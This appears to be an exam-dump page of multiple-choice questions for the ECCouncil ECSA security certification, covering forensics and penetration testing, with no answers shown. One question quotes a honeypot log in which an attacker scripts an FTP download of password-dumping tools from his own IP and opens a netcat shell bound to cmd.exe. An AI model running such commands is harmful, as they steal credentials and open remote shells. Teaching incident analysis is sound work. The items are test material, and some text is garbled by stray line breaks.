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EC0-479 Exam Dumps - ECCouncil ECSA Questions and Answers

Question # 24

With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link count reaches ________.

Options:

A.

0

B.

10

C.

100

D.

1

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Question # 25

The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

Options:

A.

An IDS evasion technique

B.

A buffer overflow attempt

C.

A DNS zone transfer

D.

Data being retrieved from 63.226.81.13

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Question # 26

The newer Macintosh Operating System is based on:

Options:

A.

OS/2

B.

BSD Unix

C.

Linux

D.

Microsoft Windows

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Question # 27

In General, ______________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the datA.

Options:

A.

Network Forensics

B.

Data Recovery

C.

Disaster Recovery

D.

Computer Forensics

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Question # 28

The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD. EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

“cmd1.exe /c open 213.116.251.162 >ftpcom”

“cmd1.exe /c echo johna2k >>ftpcom”

“cmd1.exe /c echo

haxedj00 >>ftpcom”

“cmd1.exe /c echo get n

C.

exe >>ftpcom”

“cmd1.exe /c echo get pdump.exe >>ftpcom”

“cmd1.exe /c echo get samdump.dll >>ftpcom”

“cmd1.exe /c echo quit >>ftpcom”

“cmd1.exe /c ftp-

s:ftpcom”

“cmd1.exe /c nc

-l -p 6969 -

e cmd1.exe”

What can you infer from the exploit given?

Options:

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system -johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

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Question # 29

During the course of a corporate investigation, you find that an Employee is committing a crime. Can the Employer file a criminal complain with Police?

Options:

A.

Yes, and all evidence can be turned over to the police

B.

Yes, but only if you turn the evidence over to a federal law enforcement agency

C.

No, because the investigation was conducted without following standard police procedures

D.

No, because the investigation was conducted without warrant

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Question # 30

Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?

Options:

A.

Use Vmware to be able to capture the data in memory and examine it

B.

Give the Operating System a minimal amount of memory, forcing it to use a swap file

C.

Create a Separate partition of several hundred megabytes and place the swap file there

D.

Use intrusion forensic techniques to study memory resident infections

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Question # 31

Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?

Options:

A.

Poison the switch's MAC address table by flooding it with ACK bits

B.

Enable tunneling feature on the switch

C.

Trick the switch into thinking it already has a session with Terri's computer

D.

Crash the switch with a DoS attack since switches cannot send ACK bits

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Question # 32

John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?

Options:

A.

Firewalk sets all packets with a TTL of zero

B.

Firewalk cannot pass through Cisco firewalls

C.

Firewalk sets all packets with a TTL of one

D.

Firewalk cannot be detected by network sniffers

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Question # 33

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?

Options:

A.

Enumerate domain user accounts and built-in groups

B.

Establish a remote connection to the Domain Controller

C.

Poison the DNS records with false records

D.

Enumerate MX and A records from DNS

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Exam Code: EC0-479
Exam Name: EC-Council Certified Security Analyst (ECSA)
Last Update: Jan 31, 2025
Questions: 232
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